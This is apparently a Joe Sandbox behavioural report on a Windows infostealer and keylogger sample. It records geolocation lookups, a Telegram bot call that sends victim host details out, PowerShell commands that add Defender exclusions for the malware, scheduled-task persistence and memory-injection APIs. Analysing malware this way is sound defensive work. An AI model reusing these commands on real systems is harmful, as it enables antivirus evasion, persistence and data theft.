2024-12-05 17:51:41 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298524 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTmBByBQQeiOfEPseT038jShTSDzPh2ZD1WupizywBFgT4KQykcsEKaOJHXYDGnoZHYCXujSwnbKPi3VWOwORCDp4VfNxzz7nspoaWv27iqEXB57C6%2BCUPxROixcIOY%2B%2FaZFmwcN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2bbce394372-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=242&unsent_bytes=0&cid=a8e6ca4617307fcd&ts=464&x=0"
2024-12-05 17:51:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49809	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:44 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:44 UTC	882	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298527 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmPurGoo5fBMTwe6jcDfJ6zPXTE%2B3PEOrO8u%2FESrI1nHFQBVHKFh%2FNADcInEJGlgWKqiU2n3Th%2FqfNAVSv2SJ9AJcMYkWxmQFfzC0psW1zJSXuuKbZNp%2BS5qgtqL3%2BQ8KNR3wNCO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2d04fc6180d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1567&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1829573&cwnd=201&unsent_bytes=0&cid=00fd72ae36522746&ts=458&x=0"
2024-12-05 17:51:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49815	149.154.167.220	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:46 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-05 17:51:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 05 Dec 2024 17:51:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-05 17:51:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	12:51:02
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Imagebase:	0xb20000
File size:	766'976 bytes
MD5 hash:	3C70DF024FF5A65F0785B0075939C3FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:51:06
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Imagebase:	0x730000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:51:06
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:51:07
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
Imagebase:	0x730000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:51:07
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"
Imagebase:	0xf30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:51:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:51:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:51:07
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Imagebase:	0xc40000
File size:	766'976 bytes
MD5 hash:	3C70DF024FF5A65F0785B0075939C3FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:51:09
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:51:10
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
Imagebase:	0xa10000
File size:	766'976 bytes
MD5 hash:	3C70DF024FF5A65F0785B0075939C3FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:51:14
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
Imagebase:	0xf30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:51:14
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:51:14
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
Imagebase:	0xe80000
File size:	766'976 bytes
MD5 hash:	3C70DF024FF5A65F0785B0075939C3FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.2%
Total number of Nodes:	252
Total number of Limit Nodes:	13

Executed Functions

Function 074880E8 Relevance: 15.1, Strings: 10, Instructions: 2604COMMON

Download Yara Rule

Strings

4'q, xrefs: 0748AD86
4|q, xrefs: 0748AEEB
4'q, xrefs: 07488F4B
4'q, xrefs: 074890D3
(oq, xrefs: 074881BE
4'q, xrefs: 07489FB9
4'q, xrefs: 0748ACFB
4'q, xrefs: 0748AD56
4|q, xrefs: 0748AED0
$q, xrefs: 0748ADA8

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q$4'q$4'q$4'q$4|q$4|q$$q
API String ID: 0-1265471490
Opcode ID: 8941d5b37ac9bb38ee5d36dfa99affea197690495eeb65815f867750b664353b
Instruction ID: 9200155beab2041dc5961c1357e4688df35897e7d3cd5da5709603154a52af0a
Opcode Fuzzy Hash: 8941d5b37ac9bb38ee5d36dfa99affea197690495eeb65815f867750b664353b
Instruction Fuzzy Hash: 3743FCB4A00219CFDB64EF68C988ADDB7B6BF49310F15819AD509AB361CB74ED81CF50

Function 0748BAC8 Relevance: 8.5, Strings: 6, Instructions: 1022
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pq, xrefs: 0748C791
4'q, xrefs: 0748C6B9
xbq, xrefs: 0748BBF8
<ov!, xrefs: 0748BEC4
Teq, xrefs: 0748C31C
TJq, xrefs: 0748BC6D

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 4'q$<ov!$TJq$Teq$pq$xbq
API String ID: 0-613785864
Opcode ID: fff5896d8f77de7329b2f13c34234fff4e110a18df551b2b498795ae03b747db
Instruction ID: aee791b3b85ec31dfe883751e04419bfa23a6285b1cae1c358a5d629613b2fd3
Opcode Fuzzy Hash: fff5896d8f77de7329b2f13c34234fff4e110a18df551b2b498795ae03b747db
Instruction Fuzzy Hash: 81B2B274E00229CFDB64DF69C984ADDBBB2BF89304F1581E9D509AB225DB319E81CF50

Function 07480460 Relevance: 6.9, Strings: 5, Instructions: 620
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 07480BC5
Hq, xrefs: 07480C83
Hq, xrefs: 07480A21
Hq, xrefs: 07480B3B
Hq, xrefs: 07480AB4

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: 02bb66c0834f3787350ba396f01b9910540b99bc28108a58fcc173b94552414c
Instruction ID: 3e8c7467c90c658999773dcd73739e467da9d752c06338b277a917d9d88a6818
Opcode Fuzzy Hash: 02bb66c0834f3787350ba396f01b9910540b99bc28108a58fcc173b94552414c
Instruction Fuzzy Hash: AA3260B0E102198FDB54EFA9C4547AEBBF2BF85300F14846AD409AB395DB349D89CF91

Function 076FDD85 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cbb41bfe54df55603c620a00c9513ac4179e0f7ba6070f2c450bc4afe398867
Instruction ID: 480881b610afa0cb327e63a0ec3c92579e1b1e3c17314ab5243f47c37502e0aa
Opcode Fuzzy Hash: 2cbb41bfe54df55603c620a00c9513ac4179e0f7ba6070f2c450bc4afe398867
Instruction Fuzzy Hash: 2FE16BB1B016169FEB29DB75C460BAEB7F6AFC8600F14846DE246DB3A0CB35E901C751

Function 07480452 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638c7550a5df91c5c348a51de999deea178d66440d57c53d698ee067d1b3807f
Instruction ID: 1f955070872a3dafa272852bbf450ee65bac19993997536728bef51f6a914513
Opcode Fuzzy Hash: 638c7550a5df91c5c348a51de999deea178d66440d57c53d698ee067d1b3807f
Instruction Fuzzy Hash: F6C16CB1E102098FDF64DF65C88479EBBB2BF89310F14C16AD419AB265EB70D989CF50

Function 0153D2D0 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0153D35E
GetCurrentThread.KERNEL32 ref: 0153D39B
GetCurrentProcess.KERNEL32 ref: 0153D3D8
GetCurrentThreadId.KERNEL32 ref: 0153D431

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7b964217f258bcab8a61f0793a351855307156b940bf7ab53b87db67952ee4b5
Instruction ID: 50eee2122ca98083c75c990af0866c404ea8b7e2c9ec678e7d29aa97819b9834
Opcode Fuzzy Hash: 7b964217f258bcab8a61f0793a351855307156b940bf7ab53b87db67952ee4b5
Instruction Fuzzy Hash: CE5134B1901749CFEB14CFAAD548B9EBBF1FF88314F208459E409AB350D774A944CB66

Function 0153D2E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0153D35E
GetCurrentThread.KERNEL32 ref: 0153D39B
GetCurrentProcess.KERNEL32 ref: 0153D3D8
GetCurrentThreadId.KERNEL32 ref: 0153D431

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6f14de84182d7c253bbbd6bc00a676209b3fe7b0edcb00dadc158706fddf1029
Instruction ID: bcb4d4cd157d0ee16fb980a70c1690065a7aa5130184e1e23ee0b97e5ad08d5c
Opcode Fuzzy Hash: 6f14de84182d7c253bbbd6bc00a676209b3fe7b0edcb00dadc158706fddf1029
Instruction Fuzzy Hash: 585114B0D01649CFEB14CFAAD548BAEBBF1FF88314F208459E419AB350D7746984CB66

Function 076F9267 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076F949E

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c120cc54709ec53d0f8fb38a35763eb897baf8b8731064b59f63d1188b77f90b
Instruction ID: cbd5f23f5fed0328d8acec6020f2336f7e54c14d601a72cd4b83d291bc76e8ad
Opcode Fuzzy Hash: c120cc54709ec53d0f8fb38a35763eb897baf8b8731064b59f63d1188b77f90b
Instruction Fuzzy Hash: 4F914BB1D0031ACFEF24DF69C841BEDBBB2AB44314F148169E909E7280DB74A985CF91

Function 076F9268 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076F949E

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 33cca05835c18d9894551b763a437bc072bd72e78723160b9c5ba0905ef6d606
Instruction ID: dd81c329cfaac1a9127e12fab737e148cdee4527a710a5d87892ed1a43d3fdd6
Opcode Fuzzy Hash: 33cca05835c18d9894551b763a437bc072bd72e78723160b9c5ba0905ef6d606
Instruction Fuzzy Hash: 59914BB1D0031ACFEF24DF69C841BEDBBB2AB44314F148169E909E7280DB74A985CF91

Function 0153B048 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0153B29E

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ebe4e365c92c63bf334f4a353405f1da9e61068e8ea412b4c5baa7e68b9d6da
Instruction ID: 863ed10490c425d7d691564bd2297b31a246e43777f5b0df9eeafe1cf6e7c35c
Opcode Fuzzy Hash: 2ebe4e365c92c63bf334f4a353405f1da9e61068e8ea412b4c5baa7e68b9d6da
Instruction Fuzzy Hash: BD713770A00B058FEB24DF2AD45575ABBF1FF88204F008A2ED49ADBA50DB75E945CB91

Function 015344B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015359A9

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 51f69d7b44e971fe4be72f69c9e81271f2f5a0859a1c733cd2c73e7cd60a899e
Instruction ID: c92ad49ea21cdbc45540b9a476268f997e35b7e5c89012583bfccfd31ac5d9b4
Opcode Fuzzy Hash: 51f69d7b44e971fe4be72f69c9e81271f2f5a0859a1c733cd2c73e7cd60a899e
Instruction Fuzzy Hash: F841B171C10719CFEB24DFA9C84479DBBF6BF89304F20805AD409AB251EB756946CF50

Function 015358F3 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015359A9

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d658a5a7d9328528a0456e5de4054d3e32a2b9f0832b49c438441df571c5d2a0
Instruction ID: 5d98c352c34a11b56cdbc87effc1f9b2e7dbafada0b344953079a6cfaa57cc9f
Opcode Fuzzy Hash: d658a5a7d9328528a0456e5de4054d3e32a2b9f0832b49c438441df571c5d2a0
Instruction Fuzzy Hash: CC41A271C10719CFEB28DFA9C84479DBBB6BF89304F24805AD409AB251E7756946CF50

Function 07480D88 Relevance: 1.6, APIs: 1, Instructions: 84
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07480E47

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 7178a27fb75d0fb067170cdc9209b780a307ecfc67483b15b1cdb4ebe428bda6
Instruction ID: 8a8693b1c489844edcac7e4f708e17924d8eb10b1abb2a668abc1e939418c801
Opcode Fuzzy Hash: 7178a27fb75d0fb067170cdc9209b780a307ecfc67483b15b1cdb4ebe428bda6
Instruction Fuzzy Hash: CF318A7290434D9FDB11DFA9D804AEEBFF8EF09310F14845AE954AB261C335A954DFA0

Function 076F8FD8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076F9070

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3a9bb5ae8cefe05cbad921b66f073cdd0a933bd4c07f51480a01e93de5cfc3a8
